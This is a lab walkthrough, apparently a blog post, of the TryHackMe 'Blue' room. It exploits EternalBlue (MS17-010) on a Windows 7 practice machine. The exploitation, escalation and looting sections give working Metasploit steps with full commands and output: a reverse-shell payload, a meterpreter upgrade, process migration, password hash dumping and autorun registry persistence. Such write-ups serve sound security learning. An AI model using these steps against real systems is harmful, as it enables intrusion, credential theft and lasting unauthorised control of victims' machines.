Exploiting EternalBlue
Blue holes are fascinating geological phenomena. Where bedrock dissolves, they form underwater in the middle of limestone-rich areas, and get their name from the stark contrast between them and their surroundings.
Coincidentally, a similarly-named “blue hole” exists in software. Like a sinkhole, it operated for years undercover, until a group called the Shadow Brokers leaked it to the public [source]. The effects of this vulnerability on the cybersecurity landscape are indelible and remarkable. The exploit was called EternalBlue.
Most modern systems have guards in place to prevent EternalBlue’s memory-fudging attack (CVE-2017-0144/MS17-010). Still, however, it remains a beautiful exploit for beginners like myself to test to acquaint themselves with the cybersecurity toolchain. When (mis)configured properly, Windows versions from Vista to 10 and Server 2016 are vulnerable.
With a few twists and tangents, this article will follow along with the wonderful TryHackMe Blue room to sniff around a Windows 7 box, break into it, gain privileges, and dance around with a few flags. Start the machine in the room, and we can begin with recon.
Recon
As if it’s not obvious from the name of this article and the name of the TryHackMe room, we’ll start with checking to see if this device is vulnerable to EternalBlue. Spoiler alert: it is. But this step is not wasted. There’s a different between knowing that a box a vulnerable and knowing how to tell if a box is vulnerable. Doing recon now familiarizes one with how to spot a potential EternalBlue in the wild.
$ sudo nmap -vvv -sS -sV -sC -Pn -T4 -p0-999 ${MACHINE_IP}Reading from left to right, this command:
- Turns on
sudopermissions (I always forget this part) - Fires
nmap - Makes it Very Very Verbose -
-vvv, so I know things are happening -sS- Does a SYN Stealth Scan, nothing special here since we know there are no firewalls or anything in the way-sV- Checks for versions of running services-sC- Runs the default nmap scripts-Pn- Skips the ping test to see if the host is online because we know it is-T4- Makes the timing a bit faster-p0-999- Scans just the first 1000 ports. For the sake of this demonstration, no need to be greedy${MACHINE_IP}- The IP of the box to attack
And what does this command tell us?
# Just the interesting stuff
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
...
| nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:d8:a9:3a:34:75 (unknown)
| Names:
| JON-PC<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| JON-PC<20> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| Statistics:
| 02 d8 a9 3a 34 75 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
...
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Jon-PC
| NetBIOS computer name: JON-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-07-29T03:03:51-05:00Sweet. From the port numbers alone, we could have told that the machine was a Windows box, but nmap reveals so much! In a real-world scenario, the smb results should raise at least some curiosity for whether the machine is vulnerable to EternalBlue. We can probe for vulnerabilities with nmap’s --script=vuln option.
$ sudo nmap -vvv --script=vuln -Pn -T4 -p0-999 ${MACHINE_IP}Among the lines of output we see this:
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/That looks dangerous. What does it mean?
SMB stands for Server Message Block. It serves to communicate between computers on a network primarily to share files. In practice, it operates in Windows in places like this:
Usually, Windows disables this feature on public networks. But configuration mistakes are common.
The risk level for this vulnerability is high, because as we will see, it allows an attacker full access to the computer if they are on the same network. On the one hand, for the security engineer, this should be a reminder to always keep firewalls on to protect the network’s integrity as much as possible and only enable features that are needed. For the hacker, this is low-hanging fruit. On the other hand, the exploitation process is quick and easy—two adjectives rarely seen together in the cybersecurity profession.
Exploiting
Time to break into the box. Fire up msfconsole. The first half of Intro to Metasploit and a Basic Exploit should be enough for you to get started if you haven’t already.
$ msfconsole
+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __________________ | |
| ==c(______(o(______(_() | |""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
| // \\ | ********************* |
+---------------------------+---------------------------+
| o O o | \'\/\/\/'/ |
| o O | )======( |
| o | .' LOOT '. |
| |^^^^^^^^^^^^^^|l___ | / _||__ \ |
| | PAYLOAD |""\___, | / (_||_ \ |
| |________________|__|)__| | | __||_) | |
| |(@)(@)"""**|(@)(@)**|(@) | " || " |
| = = = = = = = = = = = = | '--------------' |
+---------------------------+---------------------------+To find the exploit so you can use it, run search eternalblue. Now the exploit needs to be prepared:
msf6 exploit(windows/smb/ms17_010_eternalblue) > options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wi
ki/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Win
dows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machin
es.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows
Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 20
08 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.21 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic TargetImportant options: RHOSTS, LHOST, and the payload. Here’s what I did to configure my exploit. Depending on your setup, you should set the lhost to the interface or IP address you’re using to connect to the target.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost tun0
lhost => tun0
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts ${MACHINE_IP}
rhosts => ${MACHINE_IP}
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp
payload => windows/x64/shell/reverse_tcpAll set. Run exploit. If you want, although we already know this, you can type check first.
[+] ${MACHINE_IP}:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] ${MACHINE_IP}:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] ${MACHINE_IP}:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=If you saw that, you’re in! We’re now presented with a shell session. To background the process, press Ctrl-Z then y.
Shell Banner:
Microsoft Windows [Version 6.1.7601]
-----
C:\Windows\system32>^Z
Background session 1? [y/N] yEscalation
A Windows shell is great, but meterpreter is better. To upgrade the backgrounded session, we can use post/multi/manage/shell_to_meterpreter. We also need to let the module know which session we are upgrading, which we can do with set session 1 (or whatever the number of your session was). Finally, we have to set the right LHOST as before. Then it’s ready to run.
msf6 exploit(windows/smb/ms17_010_eternalblue) > use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf6 post(multi/manage/shell_to_meterpreter) > set lhost tun0
lhost => ${ATTACKBOX_IP}
msf6 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on ${ATTACKBOX_IP}:4433
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) >
[*] Sending stage (200774 bytes) to ${MACHINE_IP}
[*] Meterpreter session 2 opened (${ATTACKBOX_IP}:4433 -> ${MACHINE_IP}:49222) at 2022-07-30 22:11:56 +0800
[*] Stopping exploit/multi/handler
sessions -i 2
[*] Starting interaction with 2...
meterpreter >Now we have a meterpreter session! It’s better than a shell, because it can load meterpreter-specific features while allowing us to jump into a system shell if needed.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEMBased on the getuid command output, we’re now superusers on the box. It’s a good idea to migrate to a more stable process such as spoolsv after finding it with pgrep.
meterpreter > pgrep spoolsv
1292
meterpreter > migrate 1292
[*] Migrating from 1728 to 1292...
[*] Migration completed successfully.Looting
To find the passwords of users on the system, we can use hashdump. The output of that command doesn’t need to be shown here.
To find flags, meterpreter provides the search command, e.g.:
meterpreter > search -f *flag1*
Found 2 results...
==================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag1.lnk 482 2019-03-18 03:26:42 +0800
c:\flag1.txt 24 2019-03-18 03:27:21 +0800One last thing… can we get a screenshot?
The box is now ours! It’s fully under our command, and we can make sure it stays under our command with the persistence script. Although as of now it’s deprecated, it still works! The post/windows/manage/persistence_exe should function the same, however.
meterpreter > run persistence -X
[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /home/em2/.msf4/logs/persistence/JON-PC_20220730.2449/JON-PC_20220730.2449.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=${ATTACKBOX_IP} LPORT=4444
[*] Persistent agent script is 99686 bytes long
[+] Persistent Script written to C:\Windows\TEMP\ggLrbAkICk.vbs
[*] Executing script C:\Windows\TEMP\ggLrbAkICk.vbs
[+] Agent executed with PID 1120
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\BPQmhWAbp
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\BPQmhWAbpThen, we can wait for the user to log in with exploit/multi/handler.
msf6 post(windows/manage/persistence_exe) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost tun0
lhost => ${ATTACKBOX_IP}
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run -jAnd we’re done! Paths from this point include jumping from the current machine to infect others and key logging to extract sensitive information. Nasty stuff.
Recap
EternalBlue is a major vulnerability in old Windows systems. An attacker can use it to open so many pathways into a system, that essentially all your data is disclosed and at stake if your machine is vulnerable. This should come as a warning not just to guard against this specific weakness, but to be wary of the possibility of new blue holes like it appearing without warning.
🔵🕳️